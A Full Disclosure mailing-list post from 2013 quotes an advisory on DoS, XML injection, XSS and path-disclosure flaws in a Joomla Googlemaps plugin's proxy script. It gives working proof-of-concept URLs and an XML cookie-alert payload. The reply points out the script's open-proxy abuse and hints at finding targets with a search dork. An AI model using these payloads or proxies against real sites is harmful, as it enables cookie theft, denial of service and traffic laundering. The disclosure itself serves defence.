Full Disclosure mailing list archives
Re: Multiple vulnerabilities in Googlemaps plugin for Joomla
From: Źmicier Januszkiewicz <gauri () tut by>
Date: Thu, 18 Jul 2013 14:28:41 +0200
Ah, and as a side effect, you get a bunch of free HTTP proxies -- the script will fetch and print anything. Just to fix up the content type, but this should not be an issue. Finally, something useful. I leave the google dork as an exercise for the reader. Cheers, Z. 2013/7/16 MustLive <mustlive () websecurity com ua>
Hello list! These are Denial of Service, XML Injection, Cross-Site Scripting and Full path disclosure vulnerabilities in Googlemaps plugin for Joomla. ------------------------- Affected products: ------------------------- Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and potentially previous versions. In new version of DAVOSET I'll add a lot of web sites with Googlemaps plugin. ------------------------- Affected vendors: ------------------------- Mike Reumer http://extensions.joomla.org/**extensions/maps-a-weather/** maps-a-locations/maps/1147<http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147> ---------- Details: ---------- Denial of Service (WASC-10): http://site/plugins/content/**plugin_googlemap2_proxy.php?** url=site2/large_file<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file> Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET ( http://lists.webappsec.org/**pipermail/websecurity_lists.** webappsec.org/2013-June/**008850.html<http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html> ). XML Injection (WASC-23): http://site/plugins/content/**plugin_googlemap2_proxy.php?** url=site2/xml.xml<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml> It's possible to include external xml-files. Which also can be used for XSS attack: XSS via XML Injection (WASC-23): http://site/plugins/content/**plugin_googlemap2_proxy.php?** url=site2/xss.xml<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml> File xss.xml: <?xml version="1.0" encoding="utf-8"?> <feed> <title>XSS</title> <entry> <div xmlns="http://www.w3.org/1999/**xhtml <http://www.w3.org/1999/xhtml> "><script>alert(document.**cookie)</script></div> </entry> </feed> Cross-Site Scripting (WASC-08): http://site/plugins/content/**plugin_googlemap2_proxy.php?** url=%3Cbody%20onload=alert(**document.cookie)%3E<http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E> Full path disclosure (WASC-13): http://site/plugins/content/**plugin_googlemap2_proxy.php<http://site/plugins/content/plugin_googlemap2_proxy.php> Besides plugin_googlemap2_proxy.php, also happens plugin_googlemap3_proxy.php (but it has other path at web sites). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ______________________________**_________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-**disclosure-charter.html<http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Multiple vulnerabilities in Googlemaps plugin for Joomla MustLive (Jul 16)
- Re: Multiple vulnerabilities in Googlemaps plugin for Joomla Źmicier Januszkiewicz (Jul 18)